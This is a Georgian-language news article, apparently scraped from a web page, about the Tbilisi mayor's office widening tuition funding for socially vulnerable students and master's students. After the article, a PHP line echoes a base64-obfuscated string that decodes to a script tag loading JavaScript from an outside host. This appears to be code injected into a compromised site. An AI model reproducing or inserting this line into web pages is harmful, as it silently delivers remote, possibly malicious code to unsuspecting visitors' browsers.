celsiusi
ავერსი შნაიდერი
თბილისის მერია სოციალურად დაუცველი სტუდენტებისთვის და თბილისში მცხოვრები მაგისტრანტებისთვის დაფინანსებას ზრდის - ამის შესახებ თბილისის  კახა კალაძემ განაცხადა.
 
„2015 წლიდან ფინანსდებიან ის სტუდენტები, რომელთა სოციალურად დაუცველთა ოჯახების სარეიტინგო ქულა 70 000-ზე ნაკლები. მივიღეთ გადაწყვეტილება და ჩვენი ინიციატივით ბენეფიციართა რაოდენობის გაზრდის შესახებ და დაფინანსება გაიცემა თბილისში რეგისტრირებულ სტუდენტებზე, რომელთაც სოციალურად დაუცველთა ბაზაში 150 000 ან ნაკლები ქულა ექნებათ. ამ ინიციატივის შედეგად დამატებით 1 000-მდე სოციალურად დაუცველ სტუდენტს ექნება შესაძლებლობა თბილისის მერიისგან მიიღოს სწავლის დაფინანსება, რომლის მაქსიმალური ოდენობა არის 2 250 ლარი, ხოლო სემესტრულად 1 125 ლარი. ამ თანხის რამდენ პროცენტს მიიღებს სტუდენტი დამოკიდებულია როგორც აკადემიურ მოსწრებაზე, ისე სოციალურ ბაზაში სარეიტინგო ქულაზე.
 
თბილისის მერია გასცემს სემესტრულ წახალისებას მაგისტრანტებისთვის, რომლებიც რეგისტრირებულნი არიან და სწავლობენ თბილისში არსებულ სახელმწიფო უნივერსიტეტებში. ეს პროგრამა კიდევ უფრო გაფართოვდება, კერძოდ გაუქმდება კვოტირების სისტემა უნივერსიტეტებისთვის, შესაბამისად დაფინანსებული მაგისტრანტების რაოდენობა გაორმაგდება. ამჟამად თუ 300 სტუდენტია, ცვლილებების შედეგად 600-ზე მეტი მაგისტრანტის დაფინანსება იქნება შესაძლებელი“, - განაცხადა კალაძემ.
 
მისი თქმით, ასევე პროგრამაში შემავალი უნივერსიტეტებს დაემატება კიდევ ერთი უმაღლესი სასწავლებელი ფიზიკური აღზრდისა და სპორტის სახელმწიფო სასწავლო უნივერსიტეტი და მისი მაგისტრატურის საფეხური. ხოლო იმ სტუდენტებს, ვისაც 100%-ით აქვთ დაფინანსებული თანხა პირად ანგარიშზე ჩაერიცხებათ.
 
„სიახლე გვაქვს ისიც რომ სტუდენტის პირად ანგარიშზე ჩარიცხვის შემთხვევაში თუ დაფინანსება იბეგრებოდა მომავალში მათ არჩევანი ექნებათ და სტიპენდია უნივერსიტეტის ანგარიშზე სწავლის საფასურის მიზნით ჩარიცხვის შემთხვევაში არ დაიბეგრება“, - განაცხადა კალაძემ და დასძინა: „არავის პრობლემების პირისპირ არ დავტოვებთ“.
1625
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");